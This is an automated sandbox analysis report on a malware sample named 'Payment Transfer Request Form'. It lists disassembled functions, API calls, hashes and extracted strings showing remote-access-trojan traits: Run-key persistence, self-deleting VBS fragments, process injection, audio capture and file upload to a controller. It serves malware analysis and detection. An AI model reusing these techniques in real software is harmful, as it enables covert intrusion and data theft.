                                              • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                              • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$t<F$wend$while fso.FileExists("
                                              • API String ID: 1861856835-1953526029
                                              • Opcode ID: 52df1e581b5ac7a999df7769e3291922c5e5a37dcac444c5a47d4b43be2680d7
                                              • Instruction ID: 20f5f97700cb48a3d0b4a42ff25d793d854bdbfc6fb2dd54058f707cc559a17d
                                              • Opcode Fuzzy Hash: 52df1e581b5ac7a999df7769e3291922c5e5a37dcac444c5a47d4b43be2680d7
                                              • Instruction Fuzzy Hash: 579180712042405AC314FB62D8929EF77E99F90708F50453FB586B31E3EE789E49C69E
                                              Function 00410EDA Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 190synchronizationsleepfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,00472200,00471FFC,00000000), ref: 00410EF9
                                              • ExitProcess.KERNEL32(00000000), ref: 00410F05
                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00410F7F
                                              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00410F8E
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00410F99
                                              • CloseHandle.KERNEL32(00000000), ref: 00410FA0
                                              • GetCurrentProcessId.KERNEL32 ref: 00410FA6
                                              • PathFileExistsW.SHLWAPI(?), ref: 00410FD7
                                              • GetTempPathW.KERNEL32(00000104,?), ref: 0041103A
                                              • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 00411054
                                              • lstrcatW.KERNEL32(?,.exe), ref: 00411066
                                                • Part of subcall function 0041A17B: CreateFileW.KERNELBASE(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
                                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004110A6
                                              • Sleep.KERNEL32(000001F4), ref: 004110E7
                                              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004110FC
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411107
                                              • CloseHandle.KERNEL32(00000000), ref: 0041110E
                                              • GetCurrentProcessId.KERNEL32 ref: 00411114
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                              • String ID: (#G$.exe$H"G$WDH$exepath$open$temp_
                                              • API String ID: 2649220323-71629269
                                              • Opcode ID: 2d259c07ed95d09e60fa5efe04e2d1ca5b77bcbd3679d1c800de5877fac34894
                                              • Instruction ID: 69aa2ac3f34532c799e46254488c9bc95b38e37df126af38d98eea17990f3aaa
                                              • Opcode Fuzzy Hash: 2d259c07ed95d09e60fa5efe04e2d1ca5b77bcbd3679d1c800de5877fac34894
                                              • Instruction Fuzzy Hash: 9D51A671A003196BDF10A7A09C59EEE336D9B04715F5041BBF605A31E2EFBC8E86875D
                                              Function 0040BC59 Relevance: 38.8, APIs: 6, Strings: 16, Instructions: 259registryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
                                                • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BD63
                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040BD76
                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDA6
                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDB5
                                                • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(00409305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
                                                • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
                                                • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823
                                                • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BFD0
                                              • ExitProcess.KERNEL32 ref: 0040BFD7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                              • String ID: ")$.vbs$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                              • API String ID: 3797177996-2974882535
                                              • Opcode ID: e7658136c27bc430f74a74660db1f255ede8eab453f23754a1fff55f03001cb4
                                              • Instruction ID: 6c8f8b33712d81dc7036d24bc004af62d002185c7e194acf753e7914dc64dab3
                                              • Opcode Fuzzy Hash: e7658136c27bc430f74a74660db1f255ede8eab453f23754a1fff55f03001cb4
                                              • Instruction Fuzzy Hash: DD816E716042405AC714FB62D8929EF77A8AF90708F10443FF586A71E2EF789E49C69E
                                              Function 00418FFD Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 180synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 004190F2
                                              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00419106
                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00463050), ref: 0041912E
                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00471E78,00000000), ref: 00419144
                                              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00419185
                                              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041919D
                                              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 004191B2
                                              • SetEvent.KERNEL32 ref: 004191CF
                                              • WaitForSingleObject.KERNEL32(000001F4), ref: 004191E0
                                              • CloseHandle.KERNEL32 ref: 004191F0
                                              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00419212
                                              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041921C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                              • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                              • API String ID: 738084811-1354618412
                                              • Opcode ID: 6b0d4604ae0db197907c2871ebad81b04a39bd2d5f3e7ea46a2480e249bf57e6
                                              • Instruction ID: 6660e32d934ed13bda46fa62e77153e47455c80990ba371f4f5bcee5a70a39dd
                                              • Opcode Fuzzy Hash: 6b0d4604ae0db197907c2871ebad81b04a39bd2d5f3e7ea46a2480e249bf57e6
                                              • Instruction Fuzzy Hash: 6C5191712043056BD604FB75DC96EBF369CDB81398F10053FF44A621E2EE789D898A6E
                                              Function 00401A4D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                                              • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401AE3
                                              • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401AF3
                                              • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B03
                                              • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B13
                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B23
                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B34
                                              • WriteFile.KERNEL32(00000000,0046FA9A,00000002,00000000,00000000), ref: 00401B45
                                              • WriteFile.KERNEL32(00000000,0046FA9C,00000004,00000000,00000000), ref: 00401B55
                                              • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B65
                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B76
                                              • WriteFile.KERNEL32(00000000,0046FAA6,00000002,00000000,00000000), ref: 00401B87
                                              • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401B97
                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BA7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$Write$Create
                                              • String ID: RIFF$WAVE$data$fmt
                                              • API String ID: 1602526932-4212202414
                                              • Opcode ID: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
                                              • Instruction ID: fa9573d22dfebaa7cc70b9682dc8642ba3498ee27ac2ec60dc87a96e6c13d219
                                              • Opcode Fuzzy Hash: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
                                              • Instruction Fuzzy Hash: 46416F726543197AE210DB91DD85FBB7EECEB85B50F40042AF648D6080E7A4E909DBB3
                                              Function 004137DC Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 109libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
                                              • LoadLibraryA.KERNEL32(?), ref: 0041386D
                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
                                              • FreeLibrary.KERNEL32(00000000), ref: 00413894
                                              • LoadLibraryA.KERNEL32(?), ref: 004138CC
                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
                                              • FreeLibrary.KERNEL32(00000000), ref: 004138E5
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004138F4
                                              • FreeLibrary.KERNEL32(00000000), ref: 0041390B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                              • String ID: \ws2_32$\wship6$`3A$freeaddrinfo$getaddrinfo$getnameinfo
                                              • API String ID: 2490988753-3443138237
                                              • Opcode ID: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                                              • Instruction ID: d28fd91e0c22c3548fe93de424e57890752fc739e59a71d3c7449bb4191d4936
                                              • Opcode Fuzzy Hash: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                                              • Instruction Fuzzy Hash: 8831C0B2502315ABC720AF25DC489CBBBEC9F48755F41062AF84593251E7B8CE8486AE
                                              Function 0044C60D Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$EnvironmentVariable$_wcschr
                                              • String ID:
                                              • API String ID: 3899193279-0
                                              • Opcode ID: 8f8f6bf8198f661361f87136ecb7ebf93a417bae196628050410ce4dfb3fc85f
                                              • Instruction ID: f90cfe9d57a3c7213274ca364bab7ea13f4483d5bd7e80e8c07ab134bc70d503
                                              • Opcode Fuzzy Hash: 8f8f6bf8198f661361f87136ecb7ebf93a417bae196628050410ce4dfb3fc85f
                                              • Instruction Fuzzy Hash: 80D136719023007BFB60AF7598C166B7BA4AF15718F09817FF985A7381FB3989008B5D
                                              Function 0044E4A6 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • ___free_lconv_mon.LIBCMT ref: 0044E4EA
                                                • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D6FF
                                                • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D711
                                                • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D723
                                                • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D735
                                                • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D747
                                                • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D759
                                                • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D76B
                                                • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D77D
                                                • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D78F
                                                • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7A1
                                                • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7B3
                                                • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7C5
                                                • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7D7
                                              • _free.LIBCMT ref: 0044E4DF
                                                • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                              • _free.LIBCMT ref: 0044E501
                                              • _free.LIBCMT ref: 0044E516
                                              • _free.LIBCMT ref: 0044E521
                                              • _free.LIBCMT ref: 0044E543
                                              • _free.LIBCMT ref: 0044E556
                                              • _free.LIBCMT ref: 0044E564
                                              • _free.LIBCMT ref: 0044E56F
                                              • _free.LIBCMT ref: 0044E5A7
                                              • _free.LIBCMT ref: 0044E5AE
                                              • _free.LIBCMT ref: 0044E5CB
                                              • _free.LIBCMT ref: 0044E5E3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                              • String ID: pF
                                              • API String ID: 161543041-2973420481
                                              • Opcode ID: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                                              • Instruction ID: 6e8371ae3b83bc2427c047bff221b97f6cd80994471b0a2caeb41cff5b169df7
                                              • Opcode Fuzzy Hash: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                                              • Instruction Fuzzy Hash: D4315072500304AFFB205E7AD945B5BB3E5BF00719F55851FE488D6251EE39ED408B18
                                              Function 00411899 Relevance: 23.2, APIs: 9, Strings: 4, Instructions: 417sleepfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004118B2
                                                • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                                                • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                                                • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                                              • Sleep.KERNEL32(0000000A,00462E24), ref: 00411A01
                                              • Sleep.KERNEL32(0000000A,00462E24,00462E24), ref: 00411AA3
                                              • Sleep.KERNEL32(0000000A,00462E24,00462E24,00462E24), ref: 00411B42
                                              • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411B9F
                                              • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411BCF
                                              • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411C05
                                              • Sleep.KERNEL32(000001F4,00462E24,00462E24,00462E24), ref: 00411C25
                                              • Sleep.KERNEL32(00000064), ref: 00411C63
                                                • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                              • String ID: /stext "$$.F$@#G$@#G
                                              • API String ID: 1223786279-2596709126
                                              • Opcode ID: bd53cf9864bd20e9c524ce1cfd37af81de888470282f81bcb092bebe0936cb7c
                                              • Instruction ID: f36e1428a9e5a2dc2e21cca38a330b771dfaab2ce7ac60874593ee94e899fa44
                                              • Opcode Fuzzy Hash: bd53cf9864bd20e9c524ce1cfd37af81de888470282f81bcb092bebe0936cb7c
                                              • Instruction Fuzzy Hash: 1CF154311083415AD328FB65D896AEFB3D5AFD0348F40093FF586521E2EF789A4DC69A
                                              Function 0044D7E0 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 376COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free
                                              • String ID: pF
                                              • API String ID: 269201875-2973420481
                                              • Opcode ID: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
                                              • Instruction ID: 42ad863364e9847d0c0ab7d3fc56807329b255bf3c924c15ca724e031f0c4a7b
                                              • Opcode Fuzzy Hash: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
                                              • Instruction Fuzzy Hash: 4CC17576D40204ABEB20DFA9CC82FEE77F8AF09B05F154156FE04FB282D674A9458754
                                              Function 0040DE34 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 223processsynchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00472248,00471FFC,?,00000001), ref: 0040DE4E
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000001), ref: 0040DE79
                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040DE95
                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040DF14
                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000001), ref: 0040DF23
                                                • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001), ref: 0040E047
                                              • CloseHandle.KERNEL32(00000000,C:\Program Files(x86)\Internet Explorer\,?,00000001), ref: 0040E133
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                                              • String ID: 0"G$C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$!G
                                              • API String ID: 193334293-3226144251
                                              • Opcode ID: cf6d12ac23d3bea58c4b9e5c443ef1de1d55369046223e9cec53eb66751e9ba7
                                              • Instruction ID: 8a3cf51a80cb2752f7e3b1027b115d9c77e2b7a511041fa54b012784d9d6af0a
                                              • Opcode Fuzzy Hash: cf6d12ac23d3bea58c4b9e5c443ef1de1d55369046223e9cec53eb66751e9ba7
                                              • Instruction Fuzzy Hash: DB8121305083419BCA54FB61D8919EEB7E4AFA0348F40493FF586631E2EF78994DC75A
                                              Function 0041A419 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041A43B
                                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041A47F
                                              • RegCloseKey.ADVAPI32(?), ref: 0041A749
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseEnumOpen
                                              • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                              • API String ID: 1332880857-3714951968
                                              • Opcode ID: 202c19da245d775da939d21b29cef2875a47ec0cac4e3383d9ae15c6a26c9ad4
                                              • Instruction ID: 699f57f5c891f1d806a7f6c627c3d9f808e7165cae3c76f1f7c8ebce292c0808
                                              • Opcode Fuzzy Hash: 202c19da245d775da939d21b29cef2875a47ec0cac4e3383d9ae15c6a26c9ad4
                                              • Instruction Fuzzy Hash: BC8152311183419BC328EB51D891EEFB7E8EF94348F10493FF586921E2EF749949CA5A
                                              Function 0041B344 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041B38F
                                              • GetCursorPos.USER32(?), ref: 0041B39E
                                              • SetForegroundWindow.USER32(?), ref: 0041B3A7
                                              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041B3C1
                                              • Shell_NotifyIconA.SHELL32(00000002,00471AE0), ref: 0041B412
                                              • ExitProcess.KERNEL32 ref: 0041B41A
                                              • CreatePopupMenu.USER32 ref: 0041B420
                                              • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041B435
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                              • String ID: Close
                                              • API String ID: 1657328048-3535843008
                                              • Opcode ID: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
                                              • Instruction ID: 8a5f592793453ec618f968136b1e584160f7030753e38ead18fcaf25e3e96fa7
                                              • Opcode Fuzzy Hash: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
                                              • Instruction Fuzzy Hash: EB211B31110209BFDF054FA4ED0DAAA3F75FB04302F458125F906D2176D7B5D9A0AB59
                                              Function 00443268 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$Info
                                              • String ID:
                                              • API String ID: 2509303402-0
                                              • Opcode ID: fdea39b954b1f5acf66d6067823d5c965f1ccd743e2f457f67106af727a2ce82
                                              • Instruction ID: c21780bae5ed168c96e0403295faec6c801d35bf5d84feaa2b3ea2b847582f92
                                              • Opcode Fuzzy Hash: fdea39b954b1f5acf66d6067823d5c965f1ccd743e2f457f67106af727a2ce82
                                              • Instruction Fuzzy Hash: 70B1D171900305AFEB11DF69C881BEEBBF4BF08705F14456EF588A7342DB799A418B24
                                              Function 00407BB6 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 328fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407D1F
                                              • GetFileSizeEx.KERNEL32(00000000,?), ref: 00407D57
                                              • __aulldiv.LIBCMT ref: 00407D89
                                                • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                              • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00407EAC
                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407EC7
                                              • CloseHandle.KERNEL32(00000000), ref: 00407FA0
                                              • CloseHandle.KERNEL32(00000000,00000052), ref: 00407FEA
                                              • CloseHandle.KERNEL32(00000000), ref: 00408038
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                              • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                              • API String ID: 3086580692-2596673759
                                              • Opcode ID: 3628a73cbb86b5736265ac293d311146e85fdcb2316ed178213f0337e0fbe7ae
                                              • Instruction ID: 8e1224200a6c450cfdafa1dd663dcbd78fa1a86951e699dbe30fbedc525f5c9c
                                              • Opcode Fuzzy Hash: 3628a73cbb86b5736265ac293d311146e85fdcb2316ed178213f0337e0fbe7ae
                                              • Instruction Fuzzy Hash: 05B191316083409BC354FB65C891AAFB7E9AFD4314F40492FF489622D2EF789D458B8B
                                              Function 0040C3B8 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
                                                • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
                                                • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                                                • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                                                • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C412
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C571
                                              • ExitProcess.KERNEL32 ref: 0040C57D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                              • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$Temp$exepath$open
                                              • API String ID: 1913171305-2600661426
